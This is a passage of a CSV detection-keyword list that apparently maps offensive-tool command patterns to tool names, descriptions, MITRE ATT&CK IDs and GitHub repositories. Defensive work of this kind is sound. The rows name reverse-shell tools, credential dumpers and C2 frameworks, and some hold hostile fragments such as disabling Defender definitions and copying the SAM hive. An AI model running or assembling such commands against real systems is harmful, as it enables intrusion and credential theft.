redpill.ps1*",".{0,1000}\sredpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* redsocks.sh*",".{0,1000}\sredsocks\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "* --reflective-injection *",".{0,1000}\s\-\-reflective\-injection\s.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "* reg_hive_sam.py*",".{0,1000}\sreg_hive_sam\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* reg_hive_security.py*",".{0,1000}\sreg_hive_security\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* reg_hive_system.py*",".{0,1000}\sreg_hive_system\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* reg_recover-rs.exe*",".{0,1000}\sreg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* RegisterEventSourceW(L""DESKTOP-...""* L""1337*",".{0,1000}\sRegisterEventSourceW\(L\""DESKTOP\-\.\.\.\"".{0,1000}\sL\""1337.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "* -Registry -AtStartup *",".{0,1000}\s\-Registry\s\-AtStartup\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -relayserver *:5555*",".{0,1000}\s\-relayserver\s.{0,1000}\:5555.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "* -remote -bindPipe * -bindPort * -security*",".{0,1000}\s\-remote\s\-bindPipe\s.{0,1000}\s\s\-bindPort\s.{0,1000}\s\-security.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "* -Remote -ExchHostname *",".{0,1000}\s\-Remote\s\-ExchHostname\s.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "* -Remote_Posh -Location *.ps1 -Function Invoke-* -ComputerName *",".{0,1000}\s\-Remote_Posh\s\-Location\s.{0,1000}\.ps1\s\-Function\sInvoke\-.{0,1000}\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "* RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\sRemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* -RemoteDllHandle *",".{0,1000}\s\-RemoteDllHandle\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -remotefilepath *\\*.wav*",".{0,1000}\s\-remotefilepath\s.{0,1000}\\\\.{0,1000}\.wav.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "* RemoteHashRetrieval.ps1*",".{0,1000}\sRemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* --remote-impersonation*",".{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*",".{0,1000}\s\-RemotePath\s.{0,1000}\\Windows\\System32\\SAM\s\-LocalPath\s.{0,1000}\\tmp\\.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "* RemotePotato0.zip*",".{0,1000}\sRemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "* --remote-to-local socks://*",".{0,1000}\s\-\-remote\-to\-local\ssocks\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --remote-to-local tcp://*",".{0,1000}\s\-\-remote\-to\-local\stcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --remote-to-local udp://*",".{0,1000}\s\-\-remote\-to\-local\sudp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*",".{0,1000}\sremove\sdevice\sGUID\:001B2EE1\-AE95\-4146\-AE7B\-5928F1E4F396.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true*",".{0,1000}\s\-RemoveDefinitions\s\-All\sSet\-MpPreference\s\-DisableIOAVProtection\s\$true.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* renew *.kirbi*",".{0,1000}\srenew\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* renew */ticket:*",".{0,1000}\srenew\s.{0,1000}\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* repo -u https://github.com/*",".{0,1000}\srepo\s\-u\shttps\:\/\/github\.com\/.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "* -Report PrivescCheck_*",".{0,1000}\s\-Report\sPrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "* -Report PrivescCheck_*",".{0,1000}\s\-Report\sPrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "* req -username * -p * -ca * -target * -template * -upn *",".{0,1000}\sreq\s\-username\s.{0,1000}\s\-p\s.{0,1000}\s\-ca\s.{0,1000}\s\-target\s.{0,1000}\s\-template\s.{0,1000}\s\-upn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -request -dc-ip *",".{0,1000}\s\-request\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -request -format hashcat -outputfile *",".{0,1000}\s\-request\s\-format\shashcat\s\-outputfile\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* request_shellcode.exe*",".{0,1000}\srequest_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --requirement *Exegol/requirements.txt*",".{0,1000}\s\-\-requirement\s.{0,1000}Exegol\/requirements\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* resolveall.nse*",".{0,1000}\sresolveall\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* restart dnscrypt-proxy*",".{0,1000}\srestart\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "* restoresig.py*",".{0,1000}\srestoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "* --restrict-to localhost:* wss://*",".{0,1000}\s\-\-restrict\-to\slocalhost\:.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* resu ten*",".{0,1000}\sresu\sten.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rev_shell.py*",".{0,1000}\srev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "* -Reverse -IPAddress * -Port *",".{0,1000}\s\-Reverse\s\-IPAddress\s.{0,1000}\s\-Port\s.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","Invoke-PowerShellTcp args","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "* reverse_shell_generator*",".{0,1000}\sreverse_shell_generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","2703","579","2024-04-18T18:05:44Z","2021-02-27T00:53:13Z" "* reverse_shell_generator*",".{0,1000}\sreverse_shell_generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* reverse-index.nse*",".{0,1000}\sreverse\-index\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* reverse-shellcode.cpp*",".{0,1000}\sreverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "* revshell.ps1*",".{0,1000}\srevshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "* revshell.ps1*",".{0,1000}\srevshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* revshell.py*",".{0,1000}\srevshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "* revshell32.bin*",".{0,1000}\srevshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* revshell64.bin*",".{0,1000}\srevshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* -RevToSelf *",".{0,1000}\s\-RevToSelf\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* rexec-brute.nse*",".{0,1000}\srexec\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rfc868-time.nse*",".{0,1000}\srfc868\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rfs_injection.exe*",".{0,1000}\srfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for 